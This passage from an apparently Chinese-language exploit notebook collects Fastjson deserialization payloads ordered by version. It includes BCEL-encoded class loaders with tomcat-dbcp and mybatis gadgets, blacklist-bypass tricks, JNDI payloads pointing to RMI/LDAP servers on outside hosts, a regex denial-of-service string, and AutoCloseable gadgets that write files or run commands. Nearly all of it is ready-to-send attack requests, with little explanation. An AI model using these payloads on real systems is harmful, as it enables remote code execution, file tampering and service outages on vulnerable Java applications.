201 | }, 202 | "driver":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$eb$7b$UW$Z$ff$9d$ddMf2$99$ddM6$q0$b4H$80$sM$C$d9$zB$v$yX$J$J5$98$h$b2$R$K$a9$c5$c9$e4$q$3b$b0$3b$b3$9d$9dM$C$5eZ$ad$da$aaX$b5$o$b6$dem$ad$94$96$aaxY$90$da$8aZ$5b$z$w$5e$3e$f8$cd$3f$c0$8f$3e$7e$f1y$7c$ac$ef$99$99Mv$93$U$c9$93$9c$cb$fb$be$bfs$de$fb$99$bc$f9$df$ab$af$C$d8$8e$h$K$g$60$u$98$C$X$c3$b4$8c$Z$FY$982NH8$a9$40BNB$5e$81$F$5bFA$c6C2$i$ZE$Z$ae$84$92$60$cf$ca$98$931$_$qN$c98$z$e3C$K$3e$8c$8f$c8$f8$a8$82$s$3c$y$86Gd$7cL$cc$l$97$f1$a8$98$3f$n$e3$932$3e$r$e31$Z$8fK$f8$b4$82MB$85M$f8$8c$Y$3e$x$e3$8c8$f8sbxB$c1$e7qJ$M_$90$f0E$ZOJ$f8$92$82$z8$ab$e0$cb8$t$e1$x2$9eR$b0$VO$8b$e1$ab$c2$96$af$c9$f8$ba$8co$c8$f8$a6$84oI$f86C$fd$k$d32$dd$7b$Z$c2$5d$dd$87$Z$o$fd$f6$Ug$88$P$9b$W$l$z$e5$t$b93$aeO$e6$88$92$Y$b6$N$3dwXwL$b1$P$88$R7k$W$Z$d6$M$hv$3e$e5$Y$9c$hY$3b$95$v8$a65$b3$9f$96$bb$Z$e4$3dF$$$b8$mb$d8$W$J$af$l$3e$a1$cf$ea$a9$9cn$cd$a4$i$3e$9d$e3$86$9b$ea$t$8e$eb$94$M$d7v$I$p9$r$cb5$f3t$7eK$95$ec$n$9f$u$f8EC$b7$y$ee$y$f0K$ae$99Ke$7c$o$f1$eb$j$5e$y$e5$5c$a1$f3$o$3c$e3$K$ad$88$5bg$e4$f4$d3$a7$Z$9a$ab$98$fd9$bdX$U$c8$3cw$b3$f6$U$c3$da$V$94$i$f1xB$ca$9e$3cA$84$da$f3$c7$3c$gq$h$i$feP$89$X$dd$R$3aF$nM$Kd$h$X$h$v$60$90S$wdZf$b9$3e$c5$j$c1$97$e7$i$d3$f5$97$R$p$3fu$9c$$$f2$v$M$n$9b$i$X$s$oC4$e3$ea$c6$c9$R$bd$e0$85$80$b2P$c2w$u$H$v$df$u$a2tc$c6$$Q$m$ee3Ex$e2$8b$a1H$KMU$ec$c6$k$J$cf$a8x$W$dfU$f1$i$be$c7$b0$c7vf$92EOn$da$d1$f3$7c$cevN$s$e7$f8d$92$a2$e5$f2y7$Zh$9d$3c$e4$cf$fd$3ey$d0$ce$91$da$S$ce$abx$k$X$YV$cdp7$90$e8s$c9$d5$93$r$97$93$ce$f1$r$3eV$f1$C$5edhZ$ea72B$c5E$bc$c4$b0$f7V$f5$c9pg6$b7$e2$a5$ca$a2$$$M$8d$de$a6$e2$ee$Oq$f1$7c$b2$e8c$93Y$d7$z$q$Hi$a8$3d$8c$82H$a8A$_25$ca$faI$a4$e2$fb$c2$88u$b5g$z$iQ$b9K$9cq$c4$L$a0$8a$l$e0$87$94$A$f7$f7$8e$db$t$b9E$x$bb$98$b4$c88$J$97T$fc$I$3ff$60$ed$w$7e$82$9f$aa$u$e32$DT$5c$c1$cf$u$e4y$ddPq$V$_S$daR$Z$95$e6$J$3agZS$f6$i$99$ZMM$9aVjR$_f$db$7b$8dv$b2$94$f2$p$c9$e7y$7bJ$ecV$_$d5z_$c9$U$nS$f1s$bc$a2$e2UqM$b3$90I$K$99dP$5d$w$7e$81$L$w$ae$e1$97$S$7e$a5$e2$d7x$z$90$aa$a9$c1$KR$d4$5d2$b3P$8c$9e$9ci$a7$OX
$85$92K$97r$3d$af$e27x$5d$c2$h$w$7e$8b$dfU$8e$aa$$W$ca$ed$H$faT$bc$89$eb$w$7e$8f$cb$w$fe$80$3f$92$91$o$fen$8e$3cU7$9d$x$V$b3$5e$d5$da$c2$a9$z$8b$ca$ec$9f7x$c15m$92j$5b$b9$ffPgz$bb2$ae$J$ebx$96t$V$b5e$94$i$87$5bne$bf$aa$ab$7bx$a9$UUx$x$F6$u$D$_$a9$87m$3fQ$b4$g$f1$w$96$c0$ac$c8$a0$q$c9$d1$c2$a3Prv$z$efW$cbN$dc$ed$tV$c5$8a$bd$x$60$s$96a$bao$da$ceLk$96$d2$92aW$d7$f2$7e6$b1$9c$d4$bdR$d7k$s$9d$G8$b5V$87OUt$8b$W$b9$dbg$Y$bcX4$fd$d7$a2$eb$98xb$aa$eb$e9T$d1$e5y$bfH$P$3av$81$3b$ee$v$86$ce$ff$e3$87$c5V$5e$y$e4L$aa$d6$3bW$CL$ac$84ht$eda$7b$8e$3b$fd$baH$a6$da$f8$$$I$c9Y$aa$v$ff$j$a4G$f1$Ay$88$da$82$9e$a3$I$b5$ae$e0$a1$eec$q$a0$X$K$dc$o$93$7boI$f5$a0$U$c5U$ae$ed$93$u$e7$a7mgT$X$c5$d5V$e5$cb$aa$97$91a$5b$d7$ad$85$b6$f69$5dwS$B$f2$89$c5$e7$O$d0$5e$b7$M$$$7cy$ab$n$8fP$af1$de$c6$f9U$q$8a$abH$81$dd5$8d$q$m2$c4$c8$d6$aa$7eA$7d$ab$S$93$daFBp$b5T$e4$D$3cg$e6$fd7$f1$s$f7$$$f9$k$88XT$a9$e4kQ$b6$7e$a5$b5$y$af$d4$dd$d8$804$7d$n$89$9f$Q$98x$vi$7c$X$edR4SKF$5d$cfe$b0K$k$fb$5e$g$eb$3d$a2$8cwC$b4kO$A$7b$d1$e7$d1$f6U$c0$e1$bf$91$5c3A$ee$bc$82P$Z$e1D$a4$8c$ba$a1$9eD$7d$f8$VHe$c8$c3$9b$Z$ad$g$caPF$C$81F_$40$N$EF$7b$S$d1$60$99$8e$f4n$J$84$d3uZda$5d$l$mc$84L$c4$p$q$7c4$9ch$ca$94$d1$9c$96$CVB$b0Z$fcs$9a$d3$b2$s$91$g$ab4$d9$h$r$ad$8e0$N$84i$r$8cr$NM$e9$GM$d6$ea$x$c7$x$89$b6$xX$9dXS$86$W$7eg$Zk$d3$8d$89$db$d2$aa$d6$98$8e$86v$c4$b4h$Z$b7$bfH6$8f$d2_$Y$ec$b91$9a7$d4o$3a$f8$_$9a$b7$k$b4$9fy$94$e6$3e$z$9aXW$c6$3b$9eFgxG$ec$3c$dai$bf$de$db$b7E$c4$be$89$f6$ed$de$be$benG$ac5$f6$Ca$ee$A$82P$AZ$f0$d7$9e$d8$90V$cfCJl$a4$fb$h$5e$c7$9f_$c6$a6$a3$97q$87$a6$96$d1$a1$91$b2$jet$a6$d5$E$f9$bak$a8$c7$b7$b6$3b$j$d5$a2dg$8f$W$f5$N$da$7c$N$5b$d2$b1D$af$t$T8$x$99$a9$R$f4$dd$a1$c5$c4$b9$a92$ee$cax$a8$ad$e9$b8$WO$90$H$b6$95$b1$3d$dd$a4$ve$dc$9d$d8Q$ednM$J$90b$a7$i$f1$r$ee$J$bc$ae$v$81C$D$fa$cee$f4$f3$88$M$5d$S$89$U$da$Y$ea$c0$$r$a7H$b3s$e8$a0$b1$91RL$c5jD$vKc$e8E$i$3b$e9_$85$BJ$ad1$q0$81$W$ccb$V$ce$a0$VO$a2$NO$91$e4KXC$l$Okq$j$b7$e1$Gng$DX$cf$G$d1$ce$86$b0$91$8d$a1$83$8d$a3$93$9d$40$X$x$a0$9b$9dF$P$7b$E$9b$d9$T$e8eg$91d$cf$o$c
5$$$e0$$$f6$g$b6$b2$3fa$h$fb$t$b6$87$U$dc$j$da$88$5d$a4$d9$3d$a1N$aa$U$91$f6$X$d1L$d8$e7$d1O$9aD$J$7d$W$fbq$lb$84$7b$Q$ef$c1$m$e2$84$3e$84$Dx$_$e9$aa$86$da0$84aB$ad$O5b$84$S$86aC$88$91$fe$H$v$c8$3b$d9$3f$f0$3e$a2$851$c0$feN$98QD0$c6$fe$8a$Mq$eb0$c1$de$c08$ad$ea1$cb$$$e2$fd$c4$95p$86$9d$c3aZ$c9$f4$d1X$c2$R$ba$a3$BWY$W$f7$93$9c$82$eb$ec$I$8e$S$ad$R7X$G$c7h$a5$92$97$40$3a$vo$e1$3f$88Kx$40$c2$H$q$3c$e8$8d$feba$7d$dc$5b$l$f7$7f$v$k$f1$b8$ba$b6$fe$df$I$bf$85$bf$88$94$dc$t$e1$83$m$edu$_$3d$t$ff$H$88$8eZ$e2$z$O$A$A" 203 | } 204 | }:"x"}} 205 | } 206 | } 207 | ``` 208 | 209 | ### tomcat-dbcp 210 | 同样 7 和 8+ payload不一样 211 | ```xml 212 | 213 | org.apache.tomcat 214 | tomcat-dbcp 215 | 8.5.42 216 | 217 | ``` 218 | 219 | ```http 220 | POST /test HTTP/1.1 221 | Host: 127.0.0.1:8080 222 | Content-Type: application/json 223 | X-Token: whoami 224 | 225 | { 226 | "a":{ 227 | "@type":"java.lang.Class", 228 | "val":"com.sun.org.apache.bcel.internal.util.ClassLoader" 229 | }, 230 | "b":{ 231 | "@type":"java.lang.Class", 232 | "val":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 233 | }, 234 | "c":{ 235 | "@type": "com.alibaba.fastjson.JSONObject", 236 | "name": { 237 | "@type": "java.lang.Class", 238 | "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 239 | } 240 | }, 241 | "d":{ 242 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader", 243 | "e": {"f":{{ 244 | "@type": "com.alibaba.fastjson.JSONObject", 245 | "g": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": { 246 | "$ref": ".." 
},"driverClassName":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dW$eb$7b$UW$Z$ff$9d$ddMf2$99$ddM6$q0$b4H$80$sM$C$d9$zB$v$yX$J$J5$98$h$b2$R$K$a9$c5$c9$e4$q$3b$b0$3b$b3$9d$9dM$C$5eZ$ad$da$aaX$b5$o$b6$dem$ad$94$96$aaxY$90$da$8aZ$5b$z$w$5e$3e$f8$cd$3f$c0$8f$3e$7e$f1y$7c$ac$ef$99$99Mv$93$U$c9$93$9c$cb$fb$be$bfs$de$fb$99$bc$f9$df$ab$af$C$d8$8e$h$K$g$60$u$98$C$X$c3$b4$8c$Z$FY$982NH8$a9$40BNB$5e$81$F$5bFA$c6C2$i$ZE$Z$ae$84$92$60$cf$ca$98$931$_$qN$c98$z$e3C$K$3e$8c$8f$c8$f8$a8$82$s$3c$y$86Gd$7cL$cc$l$97$f1$a8$98$3f$n$e3$932$3e$r$e31$Z$8fK$f8$b4$82MB$85M$f8$8c$Y$3e$x$e3$8c8$f8sbxB$c1$e7qJ$M_$90$f0E$ZOJ$f8$92$82$z8$ab$e0$cb8$t$e1$x2$9eR$b0$VO$8b$e1$ab$c2$96$af$c9$f8$ba$8co$c8$f8$a6$84oI$f86C$fd$k$d32$dd$7b$Z$c2$5d$dd$87$Z$o$fd$f6$Ug$88$P$9b$W$l$z$e5$t$b93$aeO$e6$88$92$Y$b6$N$3dwXwL$b1$P$88$R7k$W$Z$d6$M$hv$3e$e5$Y$9c$hY$3b$95$v8$a65$b3$9f$96$bb$Z$e4$3dF$$$b8$mb$d8$W$J$af$l$3e$a1$cf$ea$a9$9cn$cd$a4$i$3e$9d$e3$86$9b$ea$t$8e$eb$94$M$d7v$I$p9$r$cb5$f3t$7eK$95$ec$n$9f$u$f8EC$b7$y$ee$y$f0K$ae$99Ke$7c$o$f1$eb$j$5e$y$e5$5c$a1$f3$o$3c$e3$K$ad$88$5bg$e4$f4$d3$a7$Z$9a$ab$98$fd9$bdX$U$c8$3cw$b3$f6$U$c3$da$V$94$i$f1xB$ca$9e$3cA$84$da$f3$c7$3c$gq$h$i$feP$89$X$dd$R$3aF$nM$Kd$h$X$h$v$60$90S$wdZf$b9$3e$c5$j$c1$97$e7$i$d3$f5$97$R$p$3fu$9c$$$f2$v$M$n$9b$i$X$s$oC4$e3$ea$c6$c9$R$bd$e0$85$80$b2P$c2w$u$H$v$df$u$a2tc$c6$$Q$m$ee3Ex$e2$8b$a1H$KMU$ec$c6$k$J$cf$a8x$W$dfU$f1$i$be$c7$b0$c7vf$92EOn$da$d1$f3$7c$cevN$s$e7$f8d$92$a2$e5$f2y7$Zh$9d$3c$e4$cf$fd$3ey$d0$ce$91$da$S$ce$abx$k$X$YV$cdp7$90$e8s$c9$d5$93$r$97$93$ce$f1$r$3eV$f1$C$5edhZ$ea72B$c5E$bc$c4$b0$f7V$f5$c9pg6$b7$e2$a5$ca$a2$$$M$8d$de$a6$e2$ee$Oq$f1$7c$b2$e8c$93Y$d7$z$q$Hi$a8$3d$8c$82H$a8A$_25$ca$faI$a4$e2$fb$c2$88u$b5g$z$iQ$b9K$9cq$c4$L$a0$8a$l$e0$87$94$A$f7$f7$8e$db$t$b9E$x$bb$98$b4$c88$J$97T$fc$I$3ff$60$ed$w$7e$82$9f$aa$u$e32$DT$5c$c1$cf$u$e4y$ddPq$V$_S$daR$Z$95$e6$J$3agZS$f6$i$99$ZMM$9aVjR$_f$db$7b$8dv$b2$94$f2$p$c9$e7y$7bJ$ecV$_$d5z_$c9$U$nS$f1s$bc$a2$e2UqM$b3$90I$K$99dP$5d$w$7e$81$L$w$ae$e1$97$S$7e$a5$e2$d7x$z$90$aa$a9$c1$KR$d4$5d2$b3P$8c$9e$9ci$a7$OX$85$
92K$97r$3d$af$e27x$5d$c2$h$w$7e$8b$dfU$8e$aa$$W$ca$ed$H$faT$bc$89$eb$w$7e$8f$cb$w$fe$80$3f$92$91$o$fen$8e$3cU7$9d$x$V$b3$5e$d5$da$c2$a9$z$8b$ca$ec$9f7x$c15m$92j$5b$b9$ffPgz$bb2$ae$J$ebx$96t$V$b5e$94$i$87$5bne$bf$aa$ab$7bx$a9$UUx$x$F6$u$D$_$a9$87m$3fQ$b4$g$f1$w$96$c0$ac$c8$a0$q$c9$d1$c2$a3Prv$z$efW$cbN$dc$ed$tV$c5$8a$bd$x$60$s$96a$bao$da$ceLk$96$d2$92aW$d7$f2$7e6$b1$9c$d4$bdR$d7k$s$9d$G8$b5V$87OUt$8b$W$b9$dbg$Y$bcX4$fd$d7$a2$eb$98xb$aa$eb$e9T$d1$e5y$bfH$P$3av$81$3b$ee$v$86$ce$ff$e3$87$c5V$5e$y$e4L$aa$d6$3bW$CL$ac$84ht$eda$7b$8e$3b$fd$baH$a6$da$f8$$$I$c9Y$aa$v$ff$j$a4G$f1$Ay$88$da$82$9e$a3$I$b5$ae$e0$a1$eec$q$a0$X$K$dc$o$93$7boI$f5$a0$U$c5U$ae$ed$93$u$e7$a7mgT$X$c5$d5V$e5$cb$aa$97$91a$5b$d7$ad$85$b6$f69$5dwS$B$f2$89$c5$e7$O$d0$5e$b7$M$$$7cy$ab$n$8fP$af1$de$c6$f9U$q$8a$abH$81$dd5$8d$q$m2$c4$c8$d6$aa$7eA$7d$ab$S$93$daFBp$b5T$e4$D$3cg$e6$fd7$f1$s$f7$$$f9$k$88XT$a9$e4kQ$b6$7e$a5$b5$y$af$d4$dd$d8$804$7d$n$89$9f$Q$98x$vi$7c$X$edR4SKF$5d$cfe$b0K$k$fb$5e$g$eb$3d$a2$8cwC$b4kO$A$7b$d1$e7$d1$f6U$c0$e1$bf$91$5c3A$ee$bc$82P$Z$e1D$a4$8c$ba$a1$9eD$7d$f8$VHe$c8$c3$9b$Z$ad$g$caPF$C$81F_$40$N$EF$7b$S$d1$60$99$8e$f4n$J$84$d3uZda$5d$l$mc$84L$c4$p$q$7c4$9ch$ca$94$d1$9c$96$CVB$b0Z$fcs$9a$d3$b2$s$91$g$ab4$d9$h$r$ad$8e0$N$84i$r$8cr$NM$e9$GM$d6$ea$x$c7$x$89$b6$xX$9dXS$86$W$7eg$Zk$d3$8d$89$db$d2$aa$d6$98$8e$86v$c4$b4h$Z$b7$bfH6$8f$d2_$Y$ec$b91$9a7$d4o$3a$f8$_$9a$b7$k$b4$9fy$94$e6$3e$z$9aXW$c6$3b$9eFgxG$ec$3c$dai$bf$de$db$b7E$c4$be$89$f6$ed$de$be$benG$ac5$f6$Ca$ee$A$82P$AZ$f0$d7$9e$d8$90V$cfCJl$a4$fb$h$5e$c7$9f_$c6$a6$a3$97q$87$a6$96$d1$a1$91$b2$jet$a6$d5$E$f9$bak$a8$c7$b7$b6$3b$j$d5$a2dg$8f$W$f5$N$da$7c$N$5b$d2$b1D$af$t$T8$x$99$a9$R$f4$dd$a1$c5$c4$b9$a92$ee$cax$a8$ad$e9$b8$WO$90$H$b6$95$b1$3d$dd$a4$ve$dc$9d$d8Q$ednM$J$90b$a7$i$f1$r$ee$J$bc$ae$v$81C$D$fa$cee$f4$f3$88$M$5d$S$89$U$da$Y$ea$c0$$r$a7H$b3s$e8$a0$b1$91RL$c5jD$vKc$e8E$i$3b$e9_$85$BJ$ad1$q0$81$W$ccb$V$ce$a0$VO$a2$NO$91$e4KXC$l$Okq$j$b7$e1$Gng$DX$cf$G$d1$ce$86$b0$91$8d$a1$83$8d$a3$93$9d$40$X$x$a0$9b$9dF$P$7b$E$9b$d9$T$e8eg$91d$cf$o$c5$$$
e0$$$f6$g$b6$b2$3fa$h$fb$t$b6$87$U$dc$j$da$88$5d$a4$d9$3d$a1N$aa$U$91$f6$X$d1L$d8$e7$d1O$9aD$J$7d$W$fbq$lb$84$7b$Q$ef$c1$m$e2$84$3e$84$Dx$_$e9$aa$86$da0$84aB$ad$O5b$84$S$86aC$88$91$fe$H$v$c8$3b$d9$3f$f0$3e$a2$851$c0$feN$98QD0$c6$fe$8a$Mq$eb0$c1$de$c08$ad$ea1$cb$$$e2$fd$c4$95p$86$9d$c3aZ$c9$f4$d1X$c2$R$ba$a3$BWY$W$f7$93$9c$82$eb$ec$I$8e$S$ad$R7X$G$c7h$a5$92$97$40$3a$vo$e1$3f$88Kx$40$c2$H$q$3c$e8$8d$feba$7d$dc$5b$l$f7$7f$v$k$f1$b8$ba$b6$fe$df$I$bf$85$bf$88$94$dc$t$e1$83$m$edu$_$3d$t$ff$H$88$8eZ$e2$z$O$A$A"}}:"x"}} 247 | } 248 | } 249 | 250 | ``` 251 | 252 | 253 | # fastjson 1.2.25-1.2.45 黑名单 254 | 这些黑名单都需要手动开启autotype 255 | `ParserConfig.getGlobalInstance().setAutoTypeSupport(true);` 256 | 257 | ## 1.2.41 加L 258 | ```json 259 | {"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 260 | ``` 261 | ## 1.2.42 双写L 262 | ```json 263 | {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 264 | ``` 265 | 266 | ## 1.2.43 加`[{` 267 | ```json 268 | {"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", "autoCommit":true} 269 | ``` 270 | 271 | ## 1.2.45 利用三方组件 272 | ### mybatis 273 | mybatis:3.x.x<3.5.0 274 | ```json 275 | {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://192.168.16.126:1099/whoopsunix"}} 276 | ``` 277 | 278 | # fastjson <=1.2.47 反序列化代码执行 279 | ## 缓存通杀 280 | 对于1.2.25-1.2.32:需关闭AutoTypeSupport 281 | 282 | ```json 283 | { 284 | "a":{ 285 | "@type":"java.lang.Class", 286 | "val":"com.sun.rowset.JdbcRowSetImpl" 287 | }, 288 | "b":{ 289 | "@type":"com.sun.rowset.JdbcRowSetImpl", 290 | "dataSourceName":"rmi://192.168.16.126:1099/whoopsunix", 291 | "autoCommit":true 292 | } 293 | } 294 | ``` 295 | 296 | ## bcel 297 | 298 | ### tomcat-dbcp 299 | 同样 7 和 8+ payload不一样 300 | ```xml 301 | 302 | org.apache.tomcat 303 | tomcat-dbcp 304 | 8.5.42 305 
| 306 | ``` 307 | 308 | 沿用前面BCEL 309 | ```http 310 | POST /test HTTP/1.1 311 | Host: 127.0.0.1:8080 312 | Content-Type: application/json 313 | cmd: whoami 314 | 315 | { 316 | "name": 317 | { 318 | "@type" : "java.lang.Class", 319 | "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" 320 | }, 321 | "x" : { 322 | "name": { 323 | "@type" : "java.lang.Class", 324 | "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" 325 | }, 326 | "y": { 327 | "@type":"com.alibaba.fastjson.JSONObject", 328 | "c": { 329 | "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", 330 | "driverClassLoader": { 331 | "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" 332 | }, 333 | "driverClassName":"$$BCEL$..", 334 | 335 | "$ref": "$.x.y.c.connection" 336 | } 337 | } 338 | } 339 | } 340 | ``` 341 | 342 | ### ibatis 343 | ```xml 344 | 345 | org.mybatis 346 | mybatis 347 | 3.5.0 348 | 349 | ``` 350 | 351 | 沿用前面BCEL 352 | ```http 353 | POST /test HTTP/1.1 354 | Host: 127.0.0.1:8080 355 | Content-Type: application/json 356 | cmd: whoami 357 | 358 | 359 | {"@type":"com.alibaba.fastjson.JSONObject","name":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource","key":{"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driver":"{$$BCEL$$..}"}} 360 | ``` 361 | 362 | 363 | 364 | # Fastjson 1.2.36 - 1.2.62 远程拒绝服务 365 | 1.2.62_noneautotype、1.2.60.sec09_noneautotype、1.2.60_noneautotype 同样存在漏洞 366 | ```json 367 | {"regex":{"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 368 | 369 | {"regex":{"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"},"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"} 370 | ``` 371 | 372 | # fastjson <= 1.2.60 反序列化代码执行 373 | 开启autotype 374 | ```xml 375 | 376 | commons-configuration 377 | 
commons-configuration 378 | 1.10 379 | 380 | ``` 381 | 382 | ```json 383 | {"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://192.168.16.126:1099/whoopsunix"} 384 | ``` 385 | 386 | # fastjson <= 1.2.61 反序列化代码执行 387 | ## configuration 388 | 开启autotype 389 | ```xml 390 | 391 | org.apache.commons 392 | commons-configuration2 393 | 2.7 394 | 395 | ``` 396 | 397 | ```json 398 | {"@type":"org.apache.commons.configuration2.JNDIConfiguration","prefix":"rmi://192.168.16.126:1099/whoopsunix"} 399 | ``` 400 | 401 | # fastjson <=1.2.62 反序列化代码执行 402 | ## xbean-reflect(确认版本是否1.2.68可用) 403 | 开启autotype 404 | ```xml 405 | 406 | org.apache.xbean 407 | xbean-reflect 408 | 4.14 409 | 410 | ``` 411 | 412 | ```json 413 | {"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/whoopsunix"} 414 | ``` 415 | 416 | # fastjson <= 1.2.66 反序列化代码执行 417 | ## shiro 418 | 开启autotype 419 | 420 | ```xml 421 | 422 | org.apache.shiro 423 | shiro-core 424 | 1.5.3 425 | 426 | ``` 427 | 428 | ```json 429 | // parseObject 430 | {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/whoopsunix"} 431 | {"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/whoopsunix"], "Realms":[""]} 432 | ``` 433 | 434 | ## Anteros 435 | 开启autotype 436 | ```xml 437 | 438 | br.com.anteros 439 | Anteros-Core 440 | 1.2.2 441 | 442 | 443 | br.com.anteros 444 | Anteros-DBCP 445 | 1.0.1 446 | 447 | ``` 448 | 449 | ```json 450 | {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/whoopsunix"} 451 | {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/whoopsunix"} 452 | ``` 453 | 454 | ## ignite-jta 455 | 开启autotype 456 | ```xml 457 | 458 | org.apache.ignite 459 | ignite-jta 460 | 2.7.6 461 | 462 | ``` 463 | 464 | ```json 465 | 
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/whoopsunix"} 466 | ``` 467 | 468 | # fastjson <= 1.2.67 反序列化代码执行和SSRF漏洞 469 | ## shiro 470 | 开启autotype 471 | ```xml 472 | 473 | com.alibaba 474 | fastjson 475 | 1.2.67 476 | compile 477 | 478 | 479 | org.apache.shiro 480 | shiro-core 481 | 1.5.3 482 | 483 | ``` 484 | 485 | ```json 486 | {"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/whoopsunix","instance":{"$ref":"$.instance"}} 487 | ``` 488 | 489 | ## ignite-jta 490 | 开启autotype 491 | ```xml 492 | 493 | 494 | org.apache.ignite 495 | ignite-jta 496 | 2.7.6 497 | 498 | ``` 499 | 500 | ```json 501 | {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/whoopsunix"], "tm": {"$ref":"$.tm"}} 502 | ``` 503 | 504 | # fastjson <=1.2.68 反序列化代码执行(AutoCloseable) 505 | ## AutoCloseable demo 506 | ```json 507 | {"@type":"java.lang.AutoCloseable","@type":"com.example.test.Test","cmd":"open -a Calculator.app"} 508 | ``` 509 | 510 | ```java 511 | public class Test implements AutoCloseable{ 512 | public Test(String cmd){ 513 | try { 514 | Runtime.getRuntime().exec(cmd); 515 | } catch (IOException e) { 516 | e.printStackTrace(); 517 | } 518 | } 519 | @Override 520 | public void close() throws Exception { 521 | 522 | } 523 | } 524 | ``` 525 | 526 | ## write file demo(Jdk11) 527 | 528 | ```json 529 | { 530 | "@type": "java.lang.AutoCloseable", 531 | "@type": "java.io.FileOutputStream", 532 | "file": "/tmp/nonexist", 533 | "append": "false" 534 | } 535 | ``` 536 | 537 | ```json 538 | { 539 | "@type": "java.lang.AutoCloseable", 540 | "@type": "java.io.FileWriter", 541 | "file": "/tmp/nonexist", 542 | "append": "false" 543 | } 544 | ``` 545 | 546 | 547 | 548 | ## MarshalOutputStream 写文件 需要进一步验证 549 | 550 | 1.2.70以下jdk11可用 551 | 552 | ```json 553 | { 554 | "@type": "java.lang.AutoCloseable", 555 | "@type": "sun.rmi.server.MarshalOutputStream", 556 | 
"out": { 557 | "@type": "java.util.zip.InflaterOutputStream", 558 | "out": { 559 | "@type": "java.io.FileOutputStream", 560 | "file": "/tmp/asdasd", 561 | "append": true 562 | }, 563 | "infl": { 564 | "input": { 565 | "array": "eJxLLE5JTCkGAAh5AnE=", 566 | "limit": 14 567 | } 568 | }, 569 | "bufLen": "100" 570 | }, 571 | "protocolVersion": 1 572 | } 573 | ``` 574 | 575 | ## SafeFileOutputStream 文件内容迁移 jdk11测试 576 | target 不存在,temp 存在,则会调用 copy 方法将 temp 的内容迁移到 target 577 | ```xml 578 | 579 | org.aspectj 580 | aspectjtools 581 | 1.5.4 582 | 583 | ``` 584 | 585 | ```json 586 | { 587 | "@type": "java.lang.AutoCloseable", 588 | "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream", 589 | "targetPath": "/Users/whoopsunix/Desktop/test", 590 | "tempPath": "/Users/whoopsunix/Desktop/pass" 591 | } 592 | ``` 593 | 594 | 595 | 596 | ## SafeFileOutputStream 追加写文件 597 | 都不存在,BufferedOutputStream -> targetPath 598 | targetPath存在,tempPath 不存在,BufferedOutputStream -> tempPath 599 | targetPath不存在,tempPath 存在,BufferedOutputStream -> targetPath 600 | targetPath存在,tempPath 存在,BufferedOutputStream -> tempPath,利用io复写绕检测 601 | 602 | ```xml 603 | 604 | org.aspectj 605 | aspectjtools 606 | 1.5.4 607 | 608 | 609 | com.esotericsoftware 610 | kryo 611 | 4.0.0 612 | 613 | 614 | com.sleepycat 615 | je 616 | 18.3.12 617 | 618 | ``` 619 | 620 | ```json 621 | { 622 | "stream": { 623 | "@type": "java.lang.AutoCloseable", 624 | "@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream", 625 | "targetPath": "C:/Users/whoopsunix/Desktop/ls/ls/4.txt", 626 | "tempPath": "a" 627 | }, 628 | "writer": { 629 | "@type": "java.lang.AutoCloseable", 630 | "@type": "com.esotericsoftware.kryo.io.Output", 631 | "buffer": "Y2VzaGk=", 632 | "outputStream": { 633 | "$ref": "$.stream" 634 | }, 635 | "position": 5 636 | }, 637 | "close": { 638 | "@type": "java.lang.AutoCloseable", 639 | "@type": "com.sleepycat.bind.serial.SerialOutput", 640 | "out": { 641 | "$ref": "$.writer" 642 | } 643 | } 644 
